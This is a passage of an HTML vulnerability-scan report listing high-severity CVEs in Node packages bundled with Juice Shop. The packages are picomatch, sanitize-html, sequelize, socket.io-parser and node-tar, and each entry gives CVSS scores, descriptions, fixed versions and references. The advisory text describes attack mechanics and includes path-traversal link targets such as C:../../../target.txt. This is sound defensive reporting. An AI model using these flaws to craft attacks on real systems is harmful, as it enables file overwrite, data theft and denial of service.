+https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d
+https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj
+https://nvd.nist.gov/vuln/detail/CVE-2026-33671
+https://www.cve.org/CVERecord?id=CVE-2026-33671

+ + + + + + + +
+
+
+
+ Finding 182: CVE-2026-33671 Picomatch 4.0.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch4.0.3
+ + + + + + + +
File Path
juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of +Service (ReDoS) when processing crafted extglob patterns. Certain +patterns using extglob quantifiers such as +() and *(), + especially when combined with overlapping alternatives or nested +extglobs, are compiled into regular expressions that can exhibit +catastrophic backtracking on non-matching input. Applications are +impacted when they allow untrusted users to supply glob patterns that +are passed to picomatch for compilation or matching. In +those cases, an attacker can cause excessive CPU consumption and block +the Node.js event loop, resulting in a denial of service. Applications +that only use trusted, developer-controlled glob patterns are much less +likely to be exposed in a security-relevant way. This issue is fixed in +picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these +versions or later, depending on their supported release line. If +upgrading is not immediately possible, avoid passing untrusted glob +patterns to picomatch. Possible mitigations include disabling extglob support for untrusted patterns by using noextglob: true, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as +() and *(), + enforcing strict allowlists for accepted pattern syntax, running +matching in an isolated worker or separate process with time and +resource limits, and applying application-level request throttling and +input validation for any endpoint that accepts glob patterns.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33671
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d
+https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj
+https://nvd.nist.gov/vuln/detail/CVE-2026-33671
+https://www.cve.org/CVERecord?id=CVE-2026-33671

+ + + + + + + +
+
+
+
+ Finding 186: CVE-2022-25887 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

sanitize-html: insecure global regular expression replacement logic may lead to ReDoS
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.7.1

+

The package sanitize-html before 2.7.1 are vulnerable to Regular +Expression Denial of Service (ReDoS) due to insecure global regular +expression replacement logic of HTML comment removal.

+ + +
Mitigation
+

2.7.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-25887
+https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c
+https://github.com/apostrophecms/sanitize-html/pull/557
+https://nvd.nist.gov/vuln/detail/CVE-2022-25887
+https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102
+https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526
+https://ubuntu.com/security/notices/USN-7464-1
+https://www.cve.org/CVERecord?id=CVE-2022-25887

+ + + + + + + +
+
+
+
+ Finding 194: CVE-2026-30951 Sequelize 6.37.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sequelize6.37.7
+ + + + + + + +
File Path
juice-shop/node_modules/sequelize/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

+ + +
Description
+

sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.37.8

+

Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL +injection via unescaped cast type in JSON/JSONB where clause processing. + The _traverseJSON() function splits JSON path keys on :: to extract a +cast type, which is interpolated raw into CAST(... AS <type>) SQL. + An attacker who controls JSON object keys can inject arbitrary SQL and +exfiltrate data from any table. This vulnerability is fixed in 6.37.8.

+ + +
Mitigation
+

6.37.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-30951
+https://github.com/sequelize/sequelize
+https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr
+https://nvd.nist.gov/vuln/detail/CVE-2026-30951
+https://www.cve.org/CVERecord?id=CVE-2026-30951

+ + + + + + + +
+
+
+
+ Finding 196: CVE-2026-33151 socket.io-parser 4.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
socket.io-parser4.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/socket.io-parser/package.json
+
+
+
+ + + + + +
Description
+

socket.io: Socket.IO: Denial of Service due to excessive buffering of specially crafted packets
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.3.5, 3.4.4, 4.2.6

+

Socket.IO is an open source, real-time, bidirectional, event-based, +communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a +specially crafted Socket.IO packet can make the server wait for a large +number of binary attachments and buffer them, which can be exploited to +make the server run out of memory. This issue has been patched in +versions 3.3.5, 3.4.4, and 4.2.6.

+ + +
Mitigation
+

3.3.5, 3.4.4, 4.2.6

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33151
+https://github.com/socketio/socket.io
+https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4
+https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf
+https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78
+https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9
+https://nvd.nist.gov/vuln/detail/CVE-2026-33151
+https://www.cve.org/CVERecord?id=CVE-2026-33151

+ + + + + + + +
+
+
+
+ Finding 198: CVE-2026-23745 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.3

+

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) +fails to sanitize the linkpath of Link (hardlink) and SymbolicLink +entries when preservePaths is false (the default secure behavior). This +allows malicious archives to bypass the extraction root restriction, +leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning +via absolute symlink targets. This vulnerability is fixed in 7.5.3.

+ + +
Mitigation
+

7.5.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23745
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
+https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
+https://nvd.nist.gov/vuln/detail/CVE-2026-23745
+https://www.cve.org/CVERecord?id=CVE-2026-23745

+ + + + + + + +
+
+
+
+ Finding 199: CVE-2026-23950 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 176 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.4

+

node-tar,a Tar for Node.js, has a race condition vulnerability in +versions up to and including 7.5.3. This is due to an incomplete +handling of Unicode path collisions in the path-reservations + system. On case-insensitive or normalization-insensitive filesystems +(such as macOS APFS, In which it has been tested), the library fails to +lock colliding paths (e.g., ß and ss), +allowing them to be processed in parallel. This bypasses the library's +internal concurrency safeguards and permits Symlink Poisoning attacks +via race conditions. The library uses a PathReservations +system to ensure that metadata checks and file operations for the same +path are serialized. This prevents race conditions where one entry might + clobber another concurrently. This is a Race Condition which enables +Arbitrary File Overwrite. This vulnerability affects users and systems +using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss + are different), conflicting paths do not have their order properly +preserved under filesystems that ignore Unicode normalization (e.g., +APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en'). As a workaround, users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

+ + +
Mitigation
+

7.5.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23950
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
+https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
+https://nvd.nist.gov/vuln/detail/CVE-2026-23950
+https://www.cve.org/CVERecord?id=CVE-2026-23950

+ + + + + + + +
+
+
+
+ Finding 200: CVE-2026-24842 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.7

+

node-tar,a Tar for Node.js, contains a vulnerability in versions +prior to 7.5.7 where the security check for hardlink entries uses +different path resolution semantics than the actual hardlink creation +logic. This mismatch allows an attacker to craft a malicious TAR archive + that bypasses path traversal protections and creates hardlinks to +arbitrary files outside the extraction directory. Version 7.5.7 contains + a fix for the issue.

+ + +
Mitigation
+

7.5.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24842
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
+https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
+https://nvd.nist.gov/vuln/detail/CVE-2026-24842
+https://www.cve.org/CVERecord?id=CVE-2026-24842

+ + + + + + + +
+
+
+
+ Finding 201: CVE-2026-26960 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

+ + +
Description
+

node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.8

+

node-tar is a full-featured Tar for Node.js. When using default +options in versions 7.5.7 and below, an attacker-controlled archive can +create a hardlink inside the extraction directory that points to a file +outside the extraction root, enabling arbitrary file read and write as +the extracting user. Severity is high because the primitive bypasses +path protections and turns archive extraction into a direct filesystem +access primitive. This issue has been fixed in version 7.5.8.

+ + +
Mitigation
+

7.5.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-26960
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384
+https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx
+https://nvd.nist.gov/vuln/detail/CVE-2026-26960
+https://www.cve.org/CVERecord?id=CVE-2026-26960

+ + + + + + + +
+
+
+
+ Finding 202: CVE-2026-29786 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: hardlink path traversal via drive-relative linkpath
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.10

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, + tar can be tricked into creating a hardlink that points outside the +extraction directory by using a drive-relative link target such as +C:../target.txt, which enables file overwrite outside cwd during normal +tar.x() extraction. This issue has been patched in version 7.5.10.

+ + +
Mitigation
+

7.5.10

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-29786
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
+https://nvd.nist.gov/vuln/detail/CVE-2026-29786
+https://www.cve.org/CVERecord?id=CVE-2026-29786

+ + + + + + + +
+
+
+
+ Finding 203: CVE-2026-31802 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

tar: tar: File overwrite via drive-relative symlink traversal
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.11

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, + tar (npm) can be tricked into creating a symlink that points outside +the extraction directory by using a drive-relative symlink target such +as C:../../../target.txt, which enables file overwrite outside cwd +during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.

+ + +
Mitigation
+

7.5.11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31802
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
+https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
+https://nvd.nist.gov/vuln/detail/CVE-2026-31802
+https://www.cve.org/CVERecord?id=CVE-2026-31802

+ + + + + + + +
+
+
+
+ Finding 205: CVE-2026-23745 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.3

+

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) +fails to sanitize the linkpath of Link (hardlink) and SymbolicLink +entries when preservePaths is false (the default secure behavior). This +allows malicious archives to bypass the extraction root restriction, +leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning +via absolute symlink targets. This vulnerability is fixed in 7.5.3.

+ + +
Mitigation
+

7.5.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23745
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
+https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
+https://nvd.nist.gov/vuln/detail/CVE-2026-23745
+https://www.cve.org/CVERecord?id=CVE-2026-23745

+ + + + + + + +
+
+
+
+ Finding 206: CVE-2026-23950 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 176 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.4

+

node-tar,a Tar for Node.js, has a race condition vulnerability in +versions up to and including 7.5.3. This is due to an incomplete +handling of Unicode path collisions in the path-reservations + system. On case-insensitive or normalization-insensitive filesystems +(such as macOS APFS, In which it has been tested), the library fails to +lock colliding paths (e.g., ß and ss), +allowing them to be processed in parallel. This bypasses the library's +internal concurrency safeguards and permits Symlink Poisoning attacks +via race conditions. The library uses a PathReservations +system to ensure that metadata checks and file operations for the same +path are serialized. This prevents race conditions where one entry might + clobber another concurrently. This is a Race Condition which enables +Arbitrary File Overwrite. This vulnerability affects users and systems +using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss + are different), conflicting paths do not have their order properly +preserved under filesystems that ignore Unicode normalization (e.g., +APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en'). As a workaround, users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

+ + +
Mitigation
+

7.5.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-23950
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
+https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
+https://nvd.nist.gov/vuln/detail/CVE-2026-23950
+https://www.cve.org/CVERecord?id=CVE-2026-23950

+ + + + + + + +
+
+
+
+ Finding 207: CVE-2026-24842 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

+ + +
Description
+

node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.7

+

node-tar,a Tar for Node.js, contains a vulnerability in versions +prior to 7.5.7 where the security check for hardlink entries uses +different path resolution semantics than the actual hardlink creation +logic. This mismatch allows an attacker to craft a malicious TAR archive + that bypasses path traversal protections and creates hardlinks to +arbitrary files outside the extraction directory. Version 7.5.7 contains + a fix for the issue.

+ + +
Mitigation
+

7.5.7

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24842
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46
+https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v
+https://nvd.nist.gov/vuln/detail/CVE-2026-24842
+https://www.cve.org/CVERecord?id=CVE-2026-24842

+ + + + + + + +
+
+
+
+ Finding 208: CVE-2026-26960 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

+ + +
Description
+

node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.8

+

node-tar is a full-featured Tar for Node.js. When using default +options in versions 7.5.7 and below, an attacker-controlled archive can +create a hardlink inside the extraction directory that points to a file +outside the extraction root, enabling arbitrary file read and write as +the extracting user. Severity is high because the primitive bypasses +path protections and turns archive extraction into a direct filesystem +access primitive. This issue has been fixed in version 7.5.8.

+ + +
Mitigation
+

7.5.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-26960
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384
+https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx
+https://nvd.nist.gov/vuln/detail/CVE-2026-26960
+https://www.cve.org/CVERecord?id=CVE-2026-26960

+ + + + + + + +
+
+
+
+ Finding 209: CVE-2026-29786 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

node-tar: hardlink path traversal via drive-relative linkpath
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.10

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, + tar can be tricked into creating a hardlink that points outside the +extraction directory by using a drive-relative link target such as +C:../target.txt, which enables file overwrite outside cwd during normal +tar.x() extraction. This issue has been patched in version 7.5.10.

+ + +
Mitigation
+

7.5.10

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-29786
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f
+https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96
+https://nvd.nist.gov/vuln/detail/CVE-2026-29786
+https://www.cve.org/CVERecord?id=CVE-2026-29786

+ + + + + + + +
+
+
+
+ Finding 210: CVE-2026-31802 Tar 6.2.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar6.2.1
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/tar/package.json
+
+
+
+ + + + + +
Description
+

tar: tar: File overwrite via drive-relative symlink traversal
+Target: Node.js
+Type: node-pkg
+Fixed version: 7.5.11

+

node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, + tar (npm) can be tricked into creating a symlink that points outside +the extraction directory by using a drive-relative symlink target such +as C:../../../target.txt, which enables file overwrite outside cwd +during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.

+ + +
Mitigation
+

7.5.11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31802
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
+https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
+https://nvd.nist.gov/vuln/detail/CVE-2026-31802
+https://www.cve.org/CVERecord?id=CVE-2026-31802

+ + + + + + + +
+
+
+
+ Finding 211: CVE-2026-23745 Tar 7.4.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
